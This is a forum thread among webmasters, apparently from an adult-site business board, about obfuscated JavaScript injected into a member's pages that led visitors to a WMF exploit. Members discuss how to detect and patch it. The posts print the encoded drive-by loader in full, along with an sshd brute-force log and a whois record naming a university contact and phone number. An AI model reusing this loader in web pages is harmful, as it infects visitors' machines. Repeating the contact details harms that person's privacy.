DutchTeenCash

uploaded a new index on dutchteenamateurs and suddenly this is on the site

<sc-ript language="JavaScript">
e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC%AD%A6%B5%BA%E2%FF%AB%B6%AC%B6% BF%B6%B5%B6%AD%A6%E7%B9%B6%BD%BD%BA%B3%FF%E3%E5%B6 %BB%AF%BE%B2%BA%C1%AC%AF%BC%E2%FF%B9%AD%AD%B1%E7%F 0%F0%AA%AC%BA%AF%AC%BC%B0%AA%B3%AD%BA%AF%F3%BC%B0% B2%F0%B3%AD%AF%BE%BB%F0%FF%C1%A8%B6%BD%AD%B9%E2%EE %C1%B9%BA%B6%B8%B9%AD%E2%EE%E3%E5%F0%B6%BB%AF%BE%B 2%BA%E3%E5%F0%BD%B6%AB%E3%C1%D2%D7";str=tmp='';for (i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</sc-ript>

WTF is that? it asked for some counter to be installed never added it, gonna scan my PC right now :/

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

boinkboink

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

Doc911

Haven't seen that one before ThinkX. looks similar to what code red was doing. did a virus scan find anything?

__________________


For PHP/MySQL scripts ICQ 161480555 or email [email protected]

Dennis69

I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace

__________________
HaHaHa

mortenb

Yep. That was a fun night!

hjnet

Do you haver an idea who it was, or how he did it?

~Ray

I'd like to know too... something new to bug my host about.

__________________
Adult Backlinks for Adult Websites - Testimonials Available

DutchTeenCash

checking with bitdefender found 2 exploits on my c drive, checking every monday so these are new since yday. Love to know what it is as well, they managed to get through BD and Im only surfing in FF

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

it opened hxxp://userscounter.com/ntraf/animation.htm

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

ok tried to open it with BD

c:\......\temp\eqe6x21s.wmf

Exploit.Win32.WMF-PFV

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

Damn Dec28 that didnt take long :/

http://www.bitdefender.us/VIRUS-1736...2.WMF-PFV.html

Exploit.Win32.WMF-PFV
Virus Encyclopedia

Spreading: LOW Discovered : 2005 Dec 28
Damage: LOW
Size: 16 KB
FREE REMOVAL TOOL : N/A
SYMPTOMS:
Automatic worm or spyware installation, without confirmation.
TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploits 'works' on Internet Explorer and some versions of Mozilla. However some browsers may display a confirmation dialog about it.

BitDefender detects this exploit as Exploit.Win32.WMF-PFV.
REMOVAL INTRUCTIONS:
Please let BitDefender delete detected files.
ANALIZED BY:
BitDefender AntiVirus Lab

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

Thomas

your server might be hacked, i've seen that before.
check other html files if you see the same thing.

DutchTeenCash

k found it

I got it through the chameleon window for tgp submission thats IE, some TGP submit page must have it too, it paste the exploit to html pages so the server isnt hacked (checked IP too it isnt)

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

thanks glad it isnt

offtopic : when are you gonna fix the chameleon submission error stating 3-4 characters minimum at the gallery url? been like that for at least 2 months

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

DutchTeenCash

feck

Jan 3 07:48:18 rhonda sshd[16932]: Failed password for invalid user test from 168.131.82.129 port 39491 ssh2
Jan 3 07:48:22 rhonda sshd[16957]: Invalid user test from 168.131.82.129
Jan 3 07:48:22 rhonda sshd[16957]: error: Could not get shadow information for NOUSER
Jan 3 07:48:22 rhonda sshd[16957]: Failed password for invalid user test from 168.131.82.129 port 39649 ssh2
Jan 3 07:48:25 rhonda sshd[16982]: Invalid user test from 168.131.82.129
Jan 3 07:48:25 rhonda sshd[16982]: error: Could not get shadow information for NOUSER
Jan 3 07:48:25 rhonda sshd[16982]: Failed password for invalid user test from 168.131.82.129 port 39760 ssh2
Jan 3 07:48:29 rhonda sshd[17004]: Invalid user test from 168.131.82.129
Jan 3 07:48:29 rhonda sshd[17004]: error: Could not get shadow information for NOUSER
Jan 3 07:48:29 rhonda sshd[17004]: Failed password for invalid user test from 168.131.82.129 port 39866 ssh2
Jan 3 07:48:33 rhonda sshd[17024]: Invalid user test from 168.131.82.129
Jan 3 07:48:33 rhonda sshd[17024]: error: Could not get shadow information for NOUSER
Jan 3 07:48:33 rhonda sshd[17024]: Failed password for invalid user test from 168.131.82.129 port 39971 ssh2
Jan 3 07:48:37 rhonda sshd[17038]: Invalid user test from 168.131.82.129
Jan 3 07:48:37 rhonda sshd[17038]: error: Could not get shadow information for NOUSER
Jan 3 07:48:37 rhonda sshd[17038]: Failed password for invalid user test from 168.131.82.129 port 40083 ssh2
Jan 3 07:48:41 rhonda sshd[17057]: Invalid user test from 168.131.82.129
Jan 3 07:48:41 rhonda sshd[17057]: error: Could not get shadow information for NOUSER
Jan 3 07:48:41 rhonda sshd[17057]: Failed password for invalid user test from 168.131.82.129 port 40184 ssh2
Jan 3 07:48:45 rhonda sshd[17076]: Invalid user test from 168.131.82.129
Jan 3 07:48:45 rhonda sshd[17076]: error: Could not get shadow information for NOUSER
Jan 3 07:48:45 rhonda sshd[17076]: Failed password for invalid user test from 168.131.82.129 port 40302 ssh2
Jan 3 07:48:49 rhonda sshd[17107]: Invalid user tester from 168.131.82.129
Jan 3 07:48:49 rhonda sshd[17107]: error: Could not get shadow information for NOUSER
Jan 3 07:48:49 rhonda sshd[17107]: Failed password for invalid user tester from 168.131.82.129 port 40449 ssh2
Jan 3 07:48:53 rhonda sshd[17124]: Invalid user tester from 168.131.82.129
Jan 3 07:48:53 rhonda sshd[17124]: error: Could not get shadow information for NOUSER
Jan 3 07:48:53 rhonda sshd[17124]: Failed password for invalid user tester from 168.131.82.129 port 40555 ssh2
Jan 3 07:48:56 rhonda sshd[17142]: Invalid user tester from 168.131.82.129
Jan 3 07:48:56 rhonda sshd[17142]: error: Could not get shadow information for NOUSER
Jan 3 07:48:56 rhonda sshd[17142]: Failed password for invalid user tester from 168.131.82.129 port 40663 ssh2
Jan 3 07:49:00 rhonda sshd[17159]: Invalid user tester from 168.131.82.129
Jan 3 07:49:00 rhonda sshd[17159]: error: Could not get shadow information for NOUSER
Jan 3 07:49:00 rhonda sshd[17159]: Failed password for invalid user tester from 168.131.82.129 port 40773 ssh2
Jan 3 07:49:04 rhonda sshd[17180]: Invalid user tester from 168.131.82.129
Jan 3 07:49:04 rhonda sshd[17180]: error: Could not get shadow information for NOUSER
Jan 3 07:49:04 rhonda sshd[17180]: Failed password for invalid user tester from 168.131.82.129 port 40873 ssh2
Jan 3 07:49:07 rhonda sshd[17245]: Invalid user tester from 168.131.82.129
Jan 3 07:49:07 rhonda sshd[17245]: error: Could not get shadow information for NOUSER
Jan 3 07:49:07 rhonda sshd[17245]: Failed password for invalid user tester from 168.131.82.129 port 40981 ssh2
Jan 3 07:49:11 rhonda sshd[17261]: Invalid user tester from 168.131.82.129
Jan 3 07:49:11 rhonda sshd[17261]: error: Could not get shadow information for NOUSER
Jan 3 07:49:11 rhonda sshd[17261]: Failed password for invalid user tester from 168.131.82.129 port 41086 ssh2
Jan 3 07:49:17 rhonda sshd[17292]: Invalid user tester from 168.131.82.129
Jan 3 07:49:17 rhonda sshd[17292]: error: Could not get shadow information for NOUSER
Jan 3 07:49:17 rhonda sshd[17292]: Failed password for invalid user tester from 168.131.82.129 port 41190 ssh2
Jan 3 07:49:21 rhonda sshd[17318]: Invalid user tester from 168.131.82.129
Jan 3 07:49:21 rhonda sshd[17318]: error: Could not get shadow information for NOUSER
Jan 3 07:49:21 rhonda sshd[17318]: Failed password for invalid user tester from 168.131.82.129 port 41376 ssh2

Location: Korea-KR [City: Seoul, Kyonggi-Do]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

APNIC says that this IP belongs to KRNIC; I'm looking it up there.



Çѱ¹ÀÎÅͳÝÁøÈï¿ø(NIDA)ÀÇ ÀÎÅͳÝÁ¤º¸¼¾ÅÍ(KRNIC)°¡ Á¦°øÇÏ´Â Whois ¼haºñ½º ÀÔ´Ï´Ù.

query: 168.131.82.129

# KOREAN

Á¶È¸°á°ú´Â ¾Æ·¡¿Í °°À¸¸ç, ½ÇÁ¦ Á¤º¸¿Í »óÀÌÇÒ ¼ö ÀÖ½À´Ï´Ù.

IPv4 ÁÖ¼Ò : 168.131.0.0-168.131.255.255
³×Æ®¿öÅ© À̸§ : CHONNAM-NET
ÇÒ´ç³»¿ª µî·ÏÀÏ : 20040625
ÇÒ´çÁ¤º¸°ø°³¿©ºÎ : Y

[ IPv4 »ç¿ë ±â°ü Á¤º¸ ]
±â°ü°íÀ¯¹øÈ£ : ORG384067
±â°ü¸í : Àü³²´ëÇб³
ÁÖ¼Ò : ±¤ÁÖ ºÏ±¸ ¿ëºÀµ¿
»ó¼¼ÁÖ¼Ò : 300¹øÁö Àü³²´ëÇб³ Á¤º¸Àü»ê¿ø
¿ìÆí ¹øÈ£ : 500-757

[ ³×Æ®¿öÅ© ´ã´çÀÚ Àι° Á¤º¸ ]
À̸§ : Á¶Àç¹Î
±â°ü¸í : Àü³²´ëÇб³
ÁÖ¼Ò : ±¤ÁÖ ºÏ±¸ ¿ëºÀµ¿
»ó¼¼ÁÖ¼Ò : 300¹øÁö Àü³²´ëÇб³ Á¤º¸Àü»ê¿ø
¿ìÆí ¹øÈ£ : 500-757
ÀüÈha ¹øÈ£ : +82-62-530-3684
ÀüÀÚ ¿ìÆí : ****@chonnam.ac.kr

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

Thomas

Error?, could be a wrong setting by the webmaster.. Hit me up on icq, I would like to see that.

spacedog

That's the piece of shit counter that loaded on me when I went to visit amacontent site.. I icq'd him to tell him about it.. it downloads trojans on users pc.. could thing I had norton on.. my IE6 got frozen, couldnt close windows & it used up resources like a motherfucker..

DutchTeenCash

yeah its only in IE ive got 5 though, its gone now, update your AV cause mine didnt get it till today... it dl a trojan yes an exploit that pastes the JS code

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

sinnerscorner

More about this at: http://www.f-secure.com/weblog/

I am just wondering are MGP's getting less clicks to their movie
galleries now as this seems to be a major exploit. And what are
the MGP reviewers using to not get infected by this.

There is a temporary Non Micro$oft Patch at
http://www.hexblog.com/

__________________
-- ok there is no sig here --

DutchTeenCash

thanks, yeah lotsa ppl wont know till they find out weeks later i think

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

hjnet

DoubleBump

Very interesting thread, so everbody should read it to avoid that shit like this spreads any further!

dziggy

They should not use IE at least. Not now, not ever

There is really good browser here I recommend: http://www.maxthon.com

__________________

ICQ# 305827231

sinnerscorner

I believe this exploit is browser independent. Anyway there is an
official micro$oft patch out as of today.

__________________
-- ok there is no sig here --

DutchTeenCash

there is I know thanks

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?